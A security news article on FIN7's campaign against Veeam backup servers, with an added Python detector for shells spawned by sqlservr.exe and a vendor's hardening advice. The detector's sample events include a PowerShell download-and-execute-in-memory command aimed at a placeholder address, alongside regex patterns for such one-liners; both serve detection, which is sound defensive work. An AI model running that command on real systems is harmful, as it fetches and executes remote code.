
Cybercrime group FIN7 targets Veeam backup servers

Researchers warn that a financially motivated cybercrime group known as FIN7 is compromising Veeam Backup & Replication servers and deploying malware on them. It’s not yet clear how the attackers are getting into the servers, but it’s possible they’re taking advantage of a vulnerability patched in the popular enterprise data replication solution last month.

Researchers at cybersecurity firm WithSecure have so far investigated two of those compromises, dating back to late March, but believe they are likely part of a larger campaign. Post-exploitation activity included persistence configuration, system and network reconnaissance, credential extraction, and lateral movement.

Tools and techniques used consistent with previous FIN7 activity

FIN7, also tracked as Carbon Spider, is a cybercrime group that has been operating since at least 2013 and has been associated with the Carbanak malware family. The group was known in its early years for launching malware attacks against organizations in the retail, restaurant and hospitality industries with the goal of stealing payment card data. FIN7 has since expanded into ransomware, with links to the Darkside and BlackMatter ransomware families and, more recently, to BlackCat/ALPHV.

A forensic analysis of the compromised Veeam servers showed that the SQL Server process “sqlservr.exe” belonging to the Veeam backup instance was used to run a batch script, which in turn downloaded and executed a PowerShell script directly in memory, without writing it to disk. This PowerShell script was POWERTRASH, an obfuscated malware loader that has been attributed to FIN7 in the past.

This PowerShell-based loader is designed to unpack embedded payloads and execute them on the system using a technique known as reflective PE injection. FIN7 was previously seen using this loader to deploy the Carbanak Trojan, the Cobalt Strike beacon, or a backdoor called DICELOADER or Lizar. The latter was also seen in recent attacks against Veeam servers, establishing another link to FIN7.

The DICELOADER backdoor allowed attackers to deploy additional custom PowerShell scripts and bash scripts. Some of the scripts used were identical to those used by FIN7 in other attacks.
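The process chain above (sqlservr.exe launching a batch script, which launches PowerShell that pulls its payload straight into memory) is itself a usable detection. As an added example that is not part of the original article or of WithSecure's analysis, the following Python applies it to process-creation records of the kind Sysmon Event ID 1 or Windows Security event 4688 produce: it flags cmd.exe or PowerShell whose ancestry includes sqlservr.exe, and raises the severity when the command line carries the markers of a download-and-execute-in-memory one-liner. The event records, file paths, PIDs and the indicator patterns are constructed for the illustration and are not taken from the investigated servers.

```python
"""Flag shells spawned (directly or via cmd.exe) by the SQL Server process,
with extra weight when the command line looks like an in-memory download.
Added example; the events below are constructed, not real telemetry."""
from __future__ import annotations

import ntpath
import re
from dataclasses import dataclass, field


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 / Security 4688 style)."""
    pid: int
    ppid: int
    image: str    # full path of the new process
    cmdline: str  # its command line


SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
SQL_PROCESS = "sqlservr.exe"

# Strings typical of a "download a script and run it without touching disk"
# PowerShell one-liner. Assumed indicator set; tune it for your environment.
IN_MEMORY_INDICATORS = {
    "iex": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "download": re.compile(r"downloadstring|downloaddata|invoke-webrequest|net\.webclient|\biwr\b", re.I),
    "encoded": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|frombase64string", re.I),
    "hidden": re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b", re.I),
}


@dataclass
class Finding:
    pid: int
    image: str
    chain: list[str]  # process names from the shell up to sqlservr.exe
    indicators: list[str] = field(default_factory=list)

    @property
    def severity(self) -> str:
        # Any shell under sqlservr.exe is unusual on a backup server; an
        # in-memory loader pattern on top of it matches the observed chain.
        return "high" if self.indicators else "medium"


def _name(path: str) -> str:
    return ntpath.basename(path).lower()


def ancestry(ev: ProcEvent, by_pid: dict[int, ProcEvent], max_depth: int = 5) -> list[str]:
    """Process names from ev upward, following the ppid links we have records for."""
    chain = [_name(ev.image)]
    cur = ev
    for _ in range(max_depth):
        parent = by_pid.get(cur.ppid)
        if parent is None:
            break
        chain.append(_name(parent.image))
        cur = parent
    return chain


def find_sql_spawned_shells(events: list[ProcEvent]) -> list[Finding]:
    """Return one Finding per shell whose ancestry includes sqlservr.exe."""
    by_pid = {e.pid: e for e in events}
    findings: list[Finding] = []
    for ev in events:
        if _name(ev.image) not in SHELLS:
            continue
        chain = ancestry(ev, by_pid)
        if SQL_PROCESS not in chain[1:]:
            continue
        hits = [name for name, rx in IN_MEMORY_INDICATORS.items() if rx.search(ev.cmdline)]
        findings.append(Finding(ev.pid, ev.image, chain[: chain.index(SQL_PROCESS) + 1], hits))
    return findings


# Constructed sample: the first three events mimic the chain described in the
# article; the rest are ordinary activity that must not fire. Paths, PIDs and
# the 198.51.100.7 address (documentation range) are made up.
SAMPLE_EVENTS = [
    ProcEvent(1200, 800, r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
              "sqlservr.exe -sMSSQLSERVER"),
    ProcEvent(3344, 1200, r"C:\Windows\System32\cmd.exe", r"cmd.exe /c C:\Windows\Temp\update.bat"),
    ProcEvent(3350, 3344, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s.ps1')"),
    ProcEvent(4100, 800, r"C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Service.exe",
              "Veeam.Backup.Service.exe"),
    ProcEvent(4200, 4100, r"C:\Windows\System32\cmd.exe", "cmd.exe /c vssadmin list writers"),
    ProcEvent(5000, 4500, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\Scripts\rotate-logs.ps1"),
]

if __name__ == "__main__":
    for f in find_sql_spawned_shells(SAMPLE_EVENTS):
        print(f"[{f.severity}] pid={f.pid} {' <- '.join(f.chain)} indicators={f.indicators}")
```

Two caveats when running this against real telemetry: parent PIDs are reused after a process exits, so join on the parent's process GUID (Sysmon provides one) or on PID plus start time rather than the bare PID used here; and the batch-script step alone (cmd.exe under sqlservr.exe, no in-memory markers) is deliberately reported at medium rather than ignored, because a database engine launching a command shell is rare enough on a backup server to deserve a look even before the PowerShell stage appears.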

Copyright © 2023 IDG Communications, Inc.


Ikaroa is keeping a close eye on the latest cybercrime trends, and this one in particular: the FIN7 group has been targeting Veeam backup servers. FIN7 is a long-running, financially motivated group that has successfully compromised businesses of all sizes around the world.

In this campaign FIN7 is compromising servers running Veeam Backup & Replication. How the attackers get in has not been confirmed, although a recently patched Veeam vulnerability is a plausible route. Veeam is commonly used by organizations to back up critical data, and the backup server holds both the backups and credentials for much of the environment, so taking it over is often an early step for attackers preparing a major attack such as ransomware deployment, since it lets them disable or destroy backups before encrypting systems.

As a precaution, Ikaroa advises all current and future clients to watch for activity matching this campaign. Monitor your backup servers closely and make sure the basic controls are in place: keep the Veeam server and its underlying SQL Server patched, use strong, unique credentials for the service and administrator accounts, and restrict which people and systems are allowed to reach the backup server at all.

Your IT team should also review network access to the backup infrastructure. Confirm that every account able to log on to the backup server is still authorized, close gaps in how users authenticate, and make sure the server's management ports are not reachable from general user networks or the internet, with any remote administration done only over trusted, encrypted connections.

It is also worth keeping at least one copy of your backups somewhere the backup server itself cannot delete or overwrite, for example in cloud object storage with immutability enabled or in a separate offline repository. That way an attacker who controls the Veeam server cannot destroy the backups along with it, and recovery after an attack stays possible.

Finally, make sure that your company has a comprehensive and up-to-date security plan in place. At Ikaroa, we specialize in helping companies create comprehensive security plans that include risk assessments and regular audits.

By taking these steps to protect against FIN7, you can dramatically reduce the risk of a successful attack.

ikaroa (https://ikaroa.com)
